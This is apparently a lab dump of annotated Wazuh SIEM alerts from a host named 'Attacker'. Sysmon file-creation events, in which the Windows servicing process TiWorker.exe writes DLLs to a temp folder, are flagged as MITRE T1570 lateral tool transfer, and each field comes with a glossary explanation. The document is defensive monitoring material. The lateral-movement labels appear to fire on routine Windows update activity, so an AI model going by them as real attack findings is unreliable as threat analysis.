full_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp6 127.0.0.1:9200 :::* 1076/java tcp6 127.0.0.1:9300 :::* 1076/java tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

previous_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  netstat listening ports
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.175+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.175+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.643528
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.0312732Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260578
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.030 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsCore.dll CreationUtcTime: 2025-04-20 01:55:28.030 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.030
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsCore.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.030
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.191+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.191+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.646493
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.0468118Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260579
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.045 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsMsg.dll CreationUtcTime: 2025-04-20 01:55:28.045 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.045
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsMsg.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.045
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.226+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.226+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.649454
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1180755Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260590
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.116 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\ReserveManager.dll CreationUtcTime: 2025-04-20 01:55:28.116 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.116
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\ReserveManager.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.116
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.226+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.226+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.652447
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.0635120Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260582
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.062 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\dpx.dll CreationUtcTime: 2025-04-20 01:55:28.062 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\dpx.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.244+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.244+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.655396
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1367565Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260595
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.135 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbocontainer.dll CreationUtcTime: 2025-04-20 01:55:28.135 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbocontainer.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.262+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.262+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.658389
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

